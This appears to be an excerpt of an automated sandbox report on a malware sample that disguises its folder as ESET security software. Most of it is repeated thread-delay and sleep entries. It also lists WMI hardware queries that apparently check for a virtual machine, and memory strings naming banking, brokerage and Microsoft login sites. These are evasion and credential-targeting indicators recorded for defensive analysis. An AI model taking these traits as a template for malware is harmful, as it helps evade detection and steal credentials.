Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596397	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599887	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599775	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599664	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599551	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599424	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599296	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599169	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599043	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598931	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598805	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598695	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598570	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598458	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598330	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598202	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598090	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597978	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597867	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597755	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597627	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597483	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597370	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597258	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597146	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597003	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596763	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596651	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596538	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596427	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596300	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596060	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 595947	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 595839	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 595726	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 595615	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 595488	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 595360	Jump to behavior

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Window / User API: threadDelayed 7269	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Window / User API: threadDelayed 2549	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Window / User API: threadDelayed 8771	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Window / User API: threadDelayed 1057	Jump to behavior

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe TID: 6336	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -599858s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -599746s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -599634s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -599507s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -599394s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -599268s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -599108s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -598979s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -598867s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -598756s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -598630s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -598503s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -598296s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -598176s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -598052s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -597924s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -597685s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -597573s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -597462s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -597352s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -597239s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -597114s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -596987s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -596733s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -596621s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -596509s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 3964	Thread sleep time: -596397s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -599887s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5336	Thread sleep count: 8771 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -599775s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5336	Thread sleep count: 1057 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -599664s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -599551s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -599424s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -599296s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -599169s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -599043s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -598931s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -598805s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -598695s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -598570s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -598458s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -598330s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -598202s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -598090s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -597978s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -597867s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -597755s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -597627s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -597483s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -597370s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -597258s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -597146s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -597003s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -596763s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -596651s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -596538s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -596427s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -596300s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -596060s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -595947s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -595839s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -595726s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -595615s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -595488s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe TID: 5428	Thread sleep time: -595360s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599858	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599746	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599634	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599507	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599394	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599268	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599108	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598979	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598867	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598756	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598630	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598503	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598296	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598176	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598052	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597924	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597685	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597573	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597462	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597352	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597239	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597114	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596987	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596733	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596621	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596509	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596397	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599887	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599775	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599664	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599551	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599424	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599296	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599169	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599043	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598931	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598805	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598695	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598570	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598458	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598330	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598202	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598090	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597978	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597867	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597755	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597627	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597483	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597370	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597258	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597146	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597003	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596763	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596651	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596538	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596427	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596300	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596060	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 595947	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 595839	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 595726	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 595615	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 595488	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 595360	Jump to behavior

Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696584680t
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696584680
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696584680p
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696584680^
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696584680n
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696584680]
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696584680x
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696584680
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696584680s
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696584680\|UE
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696584680x
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696584680u
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696584680
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696584680
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696584680}
Source: tDLozbx48F.exe, 0000000E.00000002.2445385981.0000021B6ADC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tDLozbx48F.exe, 0000000C.00000002.2434696313.000001F5900D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696584680x
